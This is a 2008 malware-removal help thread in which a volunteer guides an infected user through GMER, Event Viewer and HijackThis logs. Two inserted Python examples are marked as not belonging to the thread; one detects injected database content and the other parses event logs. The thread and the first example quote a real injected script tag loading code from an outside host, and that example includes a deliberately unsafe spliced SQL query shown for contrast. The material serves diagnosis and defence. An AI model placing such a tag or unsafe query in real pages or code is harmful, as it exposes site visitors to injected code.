Malware Removal & HijackThis Logs

30-Jun-2008, 08:11 PM
#16

Yes indeed. You never know what you're getting when you go the illegal route.

Download GMER from: http://gmer.net/index.php
Save it somewhere on your hard drive and unzip it to desktop. Double-click gmer.exe to run it, select the rootkit tab and press scan. When the scan is done, click Copy. This will copy the report to the clipboard. Paste it into Notepad and save it, and also paste the log report back here please.

__________________
Microsoft MVP - Consumer Security
Alliance of Security Analysis Professionals
01-Jul-2008, 12:08 AM
#17

Thank you for helping me, especially considering the source of my problems. I've also just noticed some problems with a Flash .swf file I published after my computer was infected. The file uses xml to communicate with a database to load content dynamically, and some of this content is now showing up with this string appended: *<script src=http://www.adwste.mobi/b.js>* When we looked at the database, that value was literally in there. My flash file only reads values from the database, but given the timing, I'm concerned it could have something to do with my local machine issues, something unseen in the Flash publishing process? The only input the Flash movie takes is search strings, but the database manager has taken steps to discard suspect characters and words. I did a Google search on that script reference, and it seems to come up all over the place, attached to all different kinds of web sites. Is this a known problem? Thanks again.

gmer scan below:
------------
GMER 1.0.14.14536 - http://www.gmer.net
Rootkit scan 2008-06-30 22:36:03
Windows 5.1.2600 Service Pack 2

---- System - GMER 1.0.14 ----

SSDT 872431B0 ZwConnectPort
SSDT \??\C:\Program Files\SUPERAntiSpyware\SASKUTIL.sys (SASKUTIL.SYS/SUPERAdBlocker.com and SUPERAntiSpyware.com) ZwTerminateProcess [0xAAE76F20]

---- User code sections - GMER 1.0.14 ----

.text C:\Program Files\Internet Explorer\IEXPLORE.EXE[3400] USER32.dll!DialogBoxParamW 7E42555F 5 Bytes JMP 42F0F301 C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation)
.text C:\Program Files\Internet Explorer\IEXPLORE.EXE[3400] USER32.dll!DialogBoxIndirectParamW 7E432032 5 Bytes JMP 430A1667 C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation)
.text C:\Program Files\Internet Explorer\IEXPLORE.EXE[3400] USER32.dll!MessageBoxIndirectA 7E43A04A 5 Bytes JMP 430A15E8 C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation)
.text C:\Program Files\Internet Explorer\IEXPLORE.EXE[3400] USER32.dll!DialogBoxParamA 7E43B10C 5 Bytes JMP 430A162C C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation)
.text C:\Program Files\Internet Explorer\IEXPLORE.EXE[3400] USER32.dll!MessageBoxExW 7E4505D8 5 Bytes JMP 430A1574 C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation)
.text C:\Program Files\Internet Explorer\IEXPLORE.EXE[3400] USER32.dll!MessageBoxExA 7E4505FC 5 Bytes JMP 430A15AE C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation)
.text C:\Program Files\Internet Explorer\IEXPLORE.EXE[3400] USER32.dll!DialogBoxIndirectParamA 7E456B50 5 Bytes JMP 430A16A2 C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation)
.text C:\Program Files\Internet Explorer\IEXPLORE.EXE[3400] USER32.dll!MessageBoxIndirectW 7E4662AB 5 Bytes JMP 42F316B6 C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation)

---- Devices - GMER 1.0.14 ----

Device Fastfat.sys (Fast FAT File System Driver/Microsoft Corporation)
AttachedDevice \Driver\Tcpip \Device\Ip SYMTDI.SYS (Network Dispatch Driver/Symantec Corporation)
AttachedDevice \Driver\Kbdclass \Device\KeyboardClass0 SynTP.sys (Synaptics Touchpad Driver/Synaptics, Inc.)
AttachedDevice \Driver\Kbdclass \Device\KeyboardClass1 SynTP.sys (Synaptics Touchpad Driver/Synaptics, Inc.)
AttachedDevice \Driver\Tcpip \Device\Tcp SYMTDI.SYS (Network Dispatch Driver/Symantec Corporation)
Device \Driver\SMBHC \Device\SmbHc SMBCLASS.SYS (SMBus Class Driver/Microsoft Corporation)
AttachedDevice \Driver\Tcpip \Device\Udp SYMTDI.SYS (Network Dispatch Driver/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\RawIp SYMTDI.SYS (Network Dispatch Driver/Symantec Corporation)
Device mrxsmb.sys (Windows NT SMB Minirdr/Microsoft Corporation)
AttachedDevice fltmgr.sys (Microsoft Filesystem Filter Manager/Microsoft Corporation)

---- EOF - GMER 1.0.14 ----
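A defender-side check for the injected database content described in the post above, added here as an example and not part of the thread: it builds a constructed in-memory SQLite table standing in for the content the Flash movie reads, flags stored values that carry an appended script tag, and contrasts a search query that splices the user's search string into SQL (the pattern a character blacklist is trying to protect) with a parameterised one. The table and column names are assumptions.

```python
import re
import sqlite3

# The thread's symptom: a script tag with an unquoted src appended to stored text.
INJECTED_SCRIPT_RE = re.compile(r"<script\b[^>]*\bsrc\s*=", re.IGNORECASE)


def build_sample_db():
    """Constructed sample content table; row 2 carries the appended tag seen in the thread."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE content (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    rows = [
        ("Summer sale", "All items 20% off"),
        ("Contact us", "Call 555-0100<script src=http://www.adwste.mobi/b.js>"),
        ("About", "Founded 1999"),
    ]
    conn.executemany("INSERT INTO content (title, body) VALUES (?, ?)", rows)
    return conn


def find_injected_rows(conn):
    """Return (row id, column) pairs whose stored text contains an injected script tag.

    Run this over every text column a page or XML feed is built from; a clean
    application tier cannot fix content that is already poisoned in the table.
    """
    hits = []
    for row_id, title, body in conn.execute("SELECT id, title, body FROM content"):
        for column, value in (("title", title), ("body", body)):
            if value and INJECTED_SCRIPT_RE.search(value):
                hits.append((row_id, column))
    return hits


def search_unsafe(conn, term):
    """Search string spliced into SQL text: the query's meaning depends on the input."""
    sql = "SELECT id FROM content WHERE body LIKE '%" + term + "%'"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn, term):
    """Parameterised query: the search string is bound as data and never parsed as SQL."""
    rows = conn.execute("SELECT id FROM content WHERE body LIKE ?", ("%" + term + "%",))
    return [row[0] for row in rows]


def unsafe_query_fails(conn, term):
    """True when the spliced query cannot even be parsed for this input (e.g. a quote)."""
    try:
        search_unsafe(conn, term)
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = build_sample_db()
    print("rows with injected script tags:", find_injected_rows(db))
    print("safe search for O'Brien:", search_safe(db, "O'Brien"))
    print("spliced search for O'Brien breaks:", unsafe_query_fails(db, "O'Brien"))
```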
01-Jul-2008, 12:28 PM
#18

Another issue - my laptop speakers have not been working lately, not sure if this has to do with the infection, scans & cleanup. My device manager seems to think everything is OK and the driver is updated, and I've gone through the standard help sound troubleshooter. I know I shouldn't continue downloading things at this time, but I tried to use Driver Detective to help me out. This program gave me this error: *1603: Error installing Microsoft(R) .NET Framework.* So this led me to scanning my machine with Regcure, which turned up 1269 errors (35 COM/ActiveX entries, 5 shared DLLs, 2 application paths, 1 help file info, 34 Windows Startup items, 611 file/path references, 56 program shortcuts, 522 empty registry keys, and 3 file associations.) At this point I stopped - I did not tell the program to fix the errors. My desktop is full of tools downloaded in the past few weeks and I do fear misusing things. Should I delete/uninstall any of these? (I have SUPERAntiSpyware and Norton 360 running). Thanks.

01-Jul-2008, 06:33 PM
#19

You were supposed to uninstall RegCure. Disregard its findings please.

Please go to Start - Run - type in eventvwr.msc to open the event viewer. Look under both "Application" and "System" for recent (the last 48 hours or so) errors (shown in red) and if found, do this for each one. Double-click the error to open it up and then click on the icon that looks like two pieces of paper. This will copy the full error. Then "paste" the error into Notepad. Do this for each one until you have them all listed in Notepad and then copy and paste the list in a reply here please.

__________________
Microsoft MVP - Consumer Security
Alliance of Security Analysis Professionals

02-Jul-2008, 03:22 PM
#20

I did uninstall RegCure, and then downloaded it again (not remembering the name) after searching on that error code. It is now uninstalled again. My device manager says Microsoft Kernel Wave Audio Mixer is missing or corrupted. Below are the clippings from the Application and System categories of my Event Viewer. (I did try to clear some space on my C drive.)

Event Type: Error
Event Source: Application Hang
Event Category: (101)
Event ID: 1002
Date: 7/2/2008
Time: 1:41 PM
User: N/A
Computer: PITATA
Description:
Hanging application iexplore.exe, version 7.0.6000.16674, hang module hungapp, version 0.0.0.0, hang address 0x00000000.

For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.
Data:
0000: 41 70 70 6c 69 63 61 74 Applicat
0008: 69 6f 6e 20 48 61 6e 67 ion Hang
0010: 20 20 69 65 78 70 6c 6f   iexplo
0018: 72 65 2e 65 78 65 20 37 re.exe 7
0020: 2e 30 2e 36 30 30 30 2e .0.6000.
0028: 31 36 36 37 34 20 69 6e 16674 in
0030: 20 68 75 6e 67 61 70 70  hungapp
0038: 20 30 2e 30 2e 30 2e 30  0.0.0.0
0040: 20 61 74 20 6f 66 66 73  at offs
0048: 65 74 20 30 30 30 30 30 et 00000
0050: 30 30 30                000

*****

Event Type: Error
Event Source: Application Hang
Event Category: (101)
Event ID: 1002
Date: 7/2/2008
Time: 11:42 AM
User: N/A
Computer: PITATA
Description:
Hanging application iexplore.exe, version 7.0.6000.16674, hang module hungapp, version 0.0.0.0, hang address 0x00000000.

For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.
Data:
0000: 41 70 70 6c 69 63 61 74 Applicat
0008: 69 6f 6e 20 48 61 6e 67 ion Hang
0010: 20 20 69 65 78 70 6c 6f   iexplo
0018: 72 65 2e 65 78 65 20 37 re.exe 7
0020: 2e 30 2e 36 30 30 30 2e .0.6000.
0028: 31 36 36 37 34 20 69 6e 16674 in
0030: 20 68 75 6e 67 61 70 70  hungapp
0038: 20 30 2e 30 2e 30 2e 30  0.0.0.0
0040: 20 61 74 20 6f 66 66 73  at offs
0048: 65 74 20 30 30 30 30 30 et 00000
0050: 30 30 30                000

*****

Event Type: Error
Event Source: Application Hang
Event Category: (101)
Event ID: 1002
Date: 7/1/2008
Time: 1:19 PM
User: N/A
Computer: PITATA
Description:
Hanging application iexplore.exe, version 7.0.6000.16674, hang module hungapp, version 0.0.0.0, hang address 0x00000000.

For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.
Data:
0000: 41 70 70 6c 69 63 61 74 Applicat
0008: 69 6f 6e 20 48 61 6e 67 ion Hang
0010: 20 20 69 65 78 70 6c 6f   iexplo
0018: 72 65 2e 65 78 65 20 37 re.exe 7
0020: 2e 30 2e 36 30 30 30 2e .0.6000.
0028: 31 36 36 37 34 20 69 6e 16674 in
0030: 20 68 75 6e 67 61 70 70  hungapp
0038: 20 30 2e 30 2e 30 2e 30  0.0.0.0
0040: 20 61 74 20 6f 66 66 73  at offs
0048: 65 74 20 30 30 30 30 30 et 00000
0050: 30 30 30                000

*****

Event Type: Error
Event Source: MsiInstaller
Event Category: None
Event ID: 11601
Date: 7/1/2008
Time: 10:59 AM
User: PITATA\ACER USER
Computer: PITATA
Description:
Product: Microsoft .NET Framework 2.0 -- Disk full: Out of disk space -- Volume: 'C:'; required space: 244,668 KB; available space: 103,120 KB. Free some disk space and retry.

For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.
Data:
0000: 7b 37 31 33 31 36 34 36 {7131646
0008: 44 2d 43 44 33 43 2d 34 D-CD3C-4
0010: 30 46 34 2d 39 37 42 39 0F4-97B9
0018: 2d 43 44 39 45 34 45 36 -CD9E4E6
0020: 32 36 32 45 46 7d       262EF}

*****

Event Type: Error
Event Source: MsiInstaller
Event Category: None
Event ID: 11601
Date: 7/1/2008
Time: 10:57 AM
User: PITATA\ACER USER
Computer: PITATA
Description:
Product: Microsoft .NET Framework 2.0 -- Disk full: Out of disk space -- Volume: 'C:'; required space: 244,668 KB; available space: 131,824 KB. Free some disk space and retry.

For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.
Data:
0000: 7b 37 31 33 31 36 34 36 {7131646
0008: 44 2d 43 44 33 43 2d 34 D-CD3C-4
0010: 30 46 34 2d 39 37 42 39 0F4-97B9
0018: 2d 43 44 39 45 34 45 36 -CD9E4E6
0020: 32 36 32 45 46 7d       262EF}

*****

Event Type: Error
Event Source: Application Error
Event Category: None
Event ID: 1000
Date: 6/30/2008
Time: 11:27 PM
User: N/A
Computer: PITATA
Description:
Faulting application iexplore.exe, version 7.0.6000.16674, faulting module unknown, version 0.0.0.0, fault address 0x07d73f68.

For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.
Data:
0000: 41 70 70 6c 69 63 61 74 Applicat
0008: 69 6f 6e 20 46 61 69 6c ion Fail
0010: 75 72 65 20 20 69 65 78 ure  iex
0018: 70 6c 6f 72 65 2e 65 78 plore.ex
0020: 65 20 37 2e 30 2e 36 30 e 7.0.60
0028: 30 30 2e 31 36 36 37 34 00.16674
0030: 20 69 6e 20 75 6e 6b 6e  in unkn
0038: 6f 77 6e 20 30 2e 30 2e own 0.0.
0040: 30 2e 30 20 61 74 20 6f 0.0 at o
0048: 66 66 73 65 74 20 30 37 ffset 07
0050: 64 37 33 66 36 38 0d 0a d73f68..

******************************************

Event Type: Error
Event Source: SideBySide
Event Category: None
Event ID: 59
Date: 7/2/2008
Time: 1:39 PM
User: N/A
Computer: PITATA
Description:
Generate Activation Context failed for C:\Program Files\PC Drivers HeadQuarters\Driver Detective\DriversHQ.DriverDetective.Client.DirectX.dll. Reference error message: The operation completed successfully. .

For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.

*****

Event Type: Error
Event Source: SideBySide
Event Category: None
Event ID: 32
Date: 7/2/2008
Time: 1:39 PM
User: N/A
Computer: PITATA
Description:
Dependent Assembly Microsoft.VC90.CRT could not be found and Last Error was The referenced assembly is not installed on your system.

For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.

*****

Event Type: Error
Event Source: Cdrom
Event Category: None
Event ID: 7
Date: 7/2/2008
Time: 7:13 AM
User: N/A
Computer: PITATA
Description:
The device, \Device\CdRom0, has a bad block.

For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.
Data:
0000: 03 00 68 00 01 00 b8 00 ..h...¸.
0008: 00 00 00 00 07 00 04 c0 .......À
0010: 00 01 00 00 9c 00 00 c0 ....œ..À
0018: 00 00 00 00 00 00 00 00 ........
0020: 00 20 66 12 00 00 00 00 . f.....
0028: 54 ff 71 00 00 00 00 00 Tÿq.....
0030: ff ff ff ff 01 00 00 00 ÿÿÿÿ....
0038: 40 00 00 c4 02 00 00 00 @..Ä....
0040: 00 20 0a 12 48 02 00 40 . ..H..@
0048: 00 00 00 00 0a 00 00 00 ........
0050: 00 00 00 00 a0 b1 20 87 .... ± ‡
0058: 00 00 00 00 60 39 1d 87 ....`9.‡
0060: 00 00 00 00 c4 4c 02 00 ....ÄL..
0068: 28 00 00 02 4c c4 00 00 (...LÄ..
0070: 02 00 00 00 00 00 00 00 ........
0078: 70 00 03 00 00 00 00 12 p.......
0080: 00 00 00 00 11 00 00 00 ........
0088: 00 00 00 00 00 00 00 00 ........

*****

Event Type: Error
Event Source: SideBySide
Event Category: None
Event ID: 59
Date: 7/1/2008
Time: 9:53 PM
User: N/A
Computer: PITATA
Description:
Generate Activation Context failed for C:\WINDOWS\system32\TAPI32.dll. Reference error message: Error Message is unavailable .

For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.

*****

Event Type: Error
Event Source: W32Time
Event Category: None
Event ID: 29
Date: 7/1/2008
Time: 9:26 AM
User: N/A
Computer: PITATA
Description:
The time provider NtpClient is configured to acquire time from one or more time sources, however none of the sources are currently accessible. No attempt to contact a source will be made for 14 minutes. NtpClient has no source of accurate time.

For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.

*****

Event Type: Error
Event Source: W32Time
Event Category: None
Event ID: 17
Date: 7/1/2008
Time: 9:26 AM
User: N/A
Computer: PITATA
Description:
Time Provider NtpClient: An error occurred during DNS lookup of the manually configured peer 'time.windows.com,0x1'. NtpClient will try the DNS lookup again in 15 minutes. The error was: A socket operation was attempted to an unreachable host. (0x80072751)

For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.

*****

Event Type: Error
Event Source: Cdrom
Event Category: None
Event ID: 7
Date: 6/30/2008
Time: 1:55 PM
User: N/A
Computer: PITATA
Description:
The device, \Device\CdRom0, has a bad block.

For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.
Data:
0000: 03 00 68 00 01 00 b8 00 ..h...¸.
0008: 00 00 00 00 07 00 04 c0 .......À
0010: 00 01 00 00 9c 00 00 c0 ....œ..À
0018: 00 00 00 00 00 00 00 00 ........
0020: 00 20 66 12 00 00 00 00 . f.....
0028: 99 3a 59 00 00 00 00 00 ™:Y.....
0030: ff ff ff ff 01 00 00 00 ÿÿÿÿ....
0038: 40 00 00 c4 02 00 00 00 @..Ä....
0040: 00 20 0a 12 48 02 00 40 . ..H..@
0048: 00 00 00 00 0a 00 00 00 ........
0050: 00 00 00 00 08 92 2c 87 .....’,‡
0058: 00 00 00 00 60 b9 1f 87 ....`¹.‡
0060: 00 00 00 00 c4 4c 02 00 ....ÄL..
0068: 28 00 00 02 4c c4 00 00 (...LÄ..
0070: 02 00 00 00 00 00 00 00 ........
0078: 70 00 03 00 00 00 00 12 p.......
0080: 00 00 00 00 11 00 00 00 ........
0088: 00 00 00 00 00 00 00 00 ........

02-Jul-2008, 04:10 PM
#21

How much RAM do you have? To find out, right-click My Computer and select Properties.

What is the size of the hard drive and how much is free? To check, click on My Computer and right-click your C drive and select "Properties".

What is the size of the paging file? To find that information, do this: Click Start, and then click Control Panel. If in Category view, click on Performance and Maintenance and then click System (if in Classic view just click System). On the Advanced tab, under Performance, click Settings. On the Advanced tab, under Virtual memory, click Change. Don't change anything but let me know what it says the size of the initial file is.

__________________
Microsoft MVP - Consumer Security
Alliance of Security Analysis Professionals

03-Jul-2008, 08:07 AM
#22

1.00 GB of RAM
C local disk 26.8 GB with 307 MB free
D local disk 27.0 GB with 477 MB free
Paging file 0 right now (I had set this to the minimum size recommended on the D drive, but every time I restart it appears on the C drive. I have to turn it off completely, then restart, then set it to the D drive. I guess I had not changed the setting in a while.)

My program files are @ 8 GB. I will be backing up and clearing more space today.

03-Jul-2008, 09:12 PM
#23

You are very low on resources. Do you defrag and empty your temporary files and temporary Internet files regularly?

Go back to the paging file and select "System Managed Size" and click "Set" and OK.

See if there are old programs you're no longer using that you can uninstall to free up some space.

Click here to download ATF Cleaner by Atribune and save it to your desktop.

Then let me know what those same numbers look like now.

__________________
Microsoft MVP - Consumer Security
Alliance of Security Analysis Professionals

04-Jul-2008, 07:21 AM
#24

I have Norton 360 set to clean up files and optimize disks regularly, and I often right-click the drives and do "Disk Cleanup". ATF Cleaner cleared up about 35 MB, but I was able to move some big files to storage. The numbers now:
C drive: 5.18 GB free, with 1034 paging file
D drive: 1.62 GB free

Should I keep the paging file on the same drive with programs? Thanks.

04-Jul-2008, 07:34 PM
#25

Please check the Event Viewer log again and post any errors from "application" and "system" that have occurred over the last 24-36 hours (since you cleared out stuff to free up resources).
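A small triage helper for the Event Viewer text requested here, added as an example and not part of the thread: it parses the XP "copy" format (line-broken or flattened onto one line, as the earlier paste came through), keeps only Error entries inside a 36-hour window, and tallies them by source and event ID so repeats stand out. The sample text is constructed from entries already posted in this thread; the reference time is an assumption (the time of post #20).

```python
import re
from collections import Counter
from datetime import datetime, timedelta

# One XP Event Viewer record. \s+ instead of newlines lets the same pattern
# read text that a forum or extractor has flattened onto a single line.
EVENT_RE = re.compile(
    r"Event Type:\s*(?P<type>\w+)\s+"
    r"Event Source:\s*(?P<source>.+?)\s+"
    r"Event Category:\s*(?P<category>.+?)\s+"
    r"Event ID:\s*(?P<id>\d+)\s+"
    r"Date:\s*(?P<date>\S+)\s+"
    r"Time:\s*(?P<time>\d{1,2}:\d{2}\s+[AP]M)\s+"
    r"User:\s*(?P<user>.+?)\s+"
    r"Computer:\s*(?P<computer>\S+)\s+"
    r"Description:\s*(?P<desc>.+?)"
    r"(?=\s*For more information|\s*Data:|\s*\*{3,}|\s*Event Type:|\s*$)",
    re.DOTALL,
)

# Assumed reference time: when post #20 with the log was made (02-Jul-2008, 03:22 PM).
POST_TIME = datetime(2008, 7, 2, 15, 22)

# Constructed sample built from three entries posted earlier in the thread; the
# third one is left flattened on purpose to show the parser copes with it.
SAMPLE_EVENT_TEXT = """Event Type: Error
Event Source: Application Hang
Event Category: (101)
Event ID: 1002
Date: 7/2/2008
Time: 1:41 PM
User: N/A
Computer: PITATA
Description:
Hanging application iexplore.exe, version 7.0.6000.16674, hang module hungapp, version 0.0.0.0, hang address 0x00000000.
For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.
Data:
0000: 41 70 70 6c 69 63 61 74 Applicat
*****
Event Type: Error
Event Source: MsiInstaller
Event Category: None
Event ID: 11601
Date: 7/1/2008
Time: 10:59 AM
User: PITATA\\ACER USER
Computer: PITATA
Description:
Product: Microsoft .NET Framework 2.0 -- Disk full: Out of disk space -- Volume: 'C:'; required space: 244,668 KB; available space: 103,120 KB. Free some disk space and retry.
For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.
*****
Event Type: Error Event Source: Application Error Event Category: None Event ID: 1000 Date: 6/30/2008 Time: 11:27 PM User: N/A Computer: PITATA Description: Faulting application iexplore.exe, version 7.0.6000.16674, faulting module unknown, version 0.0.0.0, fault address 0x07d73f68. For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.
"""


def parse_events(text):
    """Turn pasted Event Viewer text into a list of event dicts, in the order found."""
    events = []
    for m in EVENT_RE.finditer(text):
        stamp = f"{m['date']} {' '.join(m['time'].split())}"
        events.append({
            "type": m["type"],
            "source": m["source"].strip(),
            "id": int(m["id"]),
            "when": datetime.strptime(stamp, "%m/%d/%Y %I:%M %p"),
            "computer": m["computer"],
            "description": " ".join(m["desc"].split()),
        })
    return events


def recent_errors(events, now, hours=36):
    """Errors logged within the last `hours` before `now` (the 24-36 h window asked for)."""
    cutoff = now - timedelta(hours=hours)
    return [e for e in events if e["type"] == "Error" and e["when"] >= cutoff]


def tally(events):
    """Count events by (source, id) so a repeating failure is visible at a glance."""
    return Counter((e["source"], e["id"]) for e in events)


if __name__ == "__main__":
    found = parse_events(SAMPLE_EVENT_TEXT)
    recent = recent_errors(found, POST_TIME)
    for (source, event_id), count in tally(recent).most_common():
        print(f"{count}x {source} {event_id}")
```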
06-Jul-2008, 04:14 AM
#26

There are no application errors since my last post time, but I have not been using the computer much in the past two days. The two system errors that show are below. In the meantime, I updated my Windows (XP Home) to service pack 3.

Event Type: Error
Event Source: DCOM
Event Category: None
Event ID: 10010
Date: 7/6/2008
Time: 2:58 AM
User: NT AUTHORITY\SYSTEM
Computer: PITATA
Description:
The server {03E0E6C2-363B-11D3-B536-00902771A435} did not register with DCOM within the required timeout.

For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.

*****

Event Type: Error
Event Source: Service Control Manager
Event Category: None
Event ID: 7011
Date: 7/6/2008
Time: 2:58 AM
User: N/A
Computer: PITATA
Description:
Timeout (30000 milliseconds) waiting for a transaction response from the stisvc service.

For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.

06-Jul-2008, 02:00 PM
#27

Those are not serious but the second one may indicate that you didn't disconnect your camera correctly. Did you stop the device and then wait for the message that it was safe to remove it?

06-Jul-2008, 06:29 PM
#28

I probably disconnected an external hard drive at that time (I did "eject" it first, but I may have tried to access it after disconnecting?)

My main concern now is that my laptop speakers are not working - I don't know if this has anything to do with my initial problem or the steps taken to clear it up. I have now lost any reference to a *Microsoft Kernel Wave Audio Mixer* or any other error in the Device Manager. I think I used to have a choice of default device for sound playback and recording in the Sounds & Audio Devices control panel, which I no longer have. There is only one now - Conexant AMC Audio (Windows says the device is working properly, and the driver is updated... but programs like Driver Detective report a host of out-of-date drivers.)

06-Jul-2008, 07:27 PM
#29

Please do a search and let me know if you can locate this file: kmixer.sys

Please open HijackThis. Click on Open Misc Tools Section. Make sure that both boxes beside "Generate StartupList Log" are checked. Click Yes at the prompt. It will open a text file. Please copy the entire contents of that page and paste it here.

__________________
Microsoft MVP - Consumer Security
Alliance of Security Analysis Professionals

07-Jul-2008, 01:47 PM
#30

A search yielded 8 kmixer.sys references on my computer at these locations:
C:\WINDOWS\$NtServicePackUninstall$ (3 copies, kmixer.sys, kmixer.sys.000 and kmixer.sys.001)
C:\WINDOWS\$NtUninstallKB920872$
C:\WINDOWS\system32\drivers
C:\WINDOWS\ServicePackFiles\i386
C:\WINDOWS\$hf_mig$\KB920872\SP2QFE
C:\WINDOWS\SoftwareDistribution\Download\dd9ab5193501484cf5e6884fa1d22f9e

The startuplist.txt file generated by HijackThis is in two parts, below and in the next post. Thank you.

StartupList report, 7/7/2008, 12:32:07 PM
StartupList version: 1.52.2
Started from : C:\downloads\HiJackThis.EXE
Detected: Windows XP SP3 (WinNT 5.01.2600)
Detected: Internet Explorer v7.00 (7.00.6000.16674)
* Using default options
* Including empty and uninteresting sections
* Showing rarely important sections
==================================================

Running processes:

C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Acer\eManager\anbmServ.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\wscntfy.exe
C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Aspire Arcade\PCMService.exe
C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe
C:\Program Files\Launch Manager\QtZgAcer.EXE
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\Verizon\Servicepoint\VerizonServicepoint.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\Java\jre1.6.0_06\bin\jusched.exe
C:\WINDOWS\system32\WDBtnMgr.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\AIM\aim.exe
C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\Program Files\Linksys EasyLink Advisor\LinksysAgent.exe
C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Program Files\WinZip\WZQKPICK.EXE
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\Outlook Express\msimn.exe
C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\downloads\HiJackThis.exe

--------------------------------------------------

Listing of startup folders:

Shell folders Startup:
[C:\Documents and Settings\ACER USER\Start Menu\Programs\Startup]
Adobe Gamma.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe

Shell folders AltStartup:
*Folder not found*

User shell folders Startup:
*Folder not found*

User shell folders AltStartup:
*Folder not found*

Shell folders Common Startup:
[C:\Documents and Settings\All Users\Start Menu\Programs\Startup]
Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE
WinZip Quick Pick.lnk = C:\Program Files\WinZip\WZQKPICK.EXE
Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe

Shell folders Common AltStartup:
*Folder not found*

User shell folders Common Startup:
*Folder not found*

User shell folders Alternate Common Startup:
*Folder not found*

--------------------------------------------------

Checking Windows NT UserInit:

[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
UserInit = C:\WINDOWS\system32\userinit.exe,

[HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon]
*Registry key not found*

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
*Registry value not found*

[HKCU\Software\Microsoft\Windows\CurrentVersion\Winlogon]
*Registry key not found*

--------------------------------------------------

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run

LaunchApp = Alaunch
SynTPLpr = "C:\Program Files\Synaptics\SynTP\SynTPLpr.exe"
SynTPEnh = "C:\Program Files\Synaptics\SynTP\SynTPEnh.exe"
PCMService = "C:\Program Files\Aspire Arcade\PCMService.exe"
IMJPMIG8.1 = "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
MSPY2002 = "C:\WINDOWS\System32\IME\PINTLGNT\ImScInst.exe" /SYNC
PHIME2002ASync = "C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE" /SYNC
PHIME2002A = "C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE" /IMEName
ATIPTA = "C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe"
LManager = "C:\Program Files\Launch Manager\QtZgAcer.EXE"
QuickTime Task = "C:\Program Files\QuickTime\qttask.exe" -atboottime
VerizonServicepoint.exe = "C:\Program Files\Verizon\Servicepoint\VerizonServicepoint.exe"
ccApp = "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
NoteBurner = C:\Program Files\NoteBurner\VTBurnerGUI.exe /silence
iTunesHelper = "C:\Program Files\iTunes\iTunesHelper.exe"
